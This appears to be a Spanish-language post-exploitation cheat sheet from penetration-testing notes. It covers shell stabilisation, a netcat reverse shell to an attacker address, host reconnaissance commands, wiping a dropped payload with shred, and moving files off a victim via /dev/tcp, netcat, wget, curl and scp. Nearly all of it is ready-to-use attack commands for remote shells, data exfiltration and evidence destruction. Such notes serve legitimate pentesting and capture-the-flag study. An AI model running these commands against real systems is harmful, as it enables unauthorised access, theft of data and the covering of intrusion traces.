Post-Explotación

Tratamiento TTY:

script /dev/null -c bash
# Ctrl + Z
stty raw -echo;fg
reset xterm
export TERM=xterm SHELL=bash
# stty -a en tu terminal para ver config
stty rows <x> cols <y> 
Reenviar simple bash
nc -lvnp <Port> 
nc <IPa> <Port> -e /bin/bash
Python simple shell
python -c 'import pty; pty.spawn("/bin/sh")'

Checkear

whoami # username
id # user groups
ifconfig # Config de red > IP correcta? contenedor?
env # variables de entorno > Contenedor?
uname -a # OS version
netstat -an # Conexiones de red
ps -ef # Procesos activos

Borrar evidencias:

shred -zun 20 -v <payload.php> # Para qué quieres esto? Eres un blackhat?

Todo sobre transferencias:

python3 -m http.server <port>

wget <IPa>:<port>/<file>
curl -O http://<IPa>:<port>/<file>
nc -lvp 4444 < file
nc 192.168.1.102 4444 > file

Desde víctima sin netcat

# mediante cateo
cat < <file> > /dev/tcp/<IPa>/<port>
nc -lvnp <port> > <file>

SCP (ssh pwned)

scp <user>@<IPv>:/<directory>/<file> # Copiar archivo
scp -P <puerto> <user>@<IPv>:/<directory>/<file> # Si SSH no es p22
scp -r <user>@<IPv>:/<directory> # Copiar directorio

Última actualización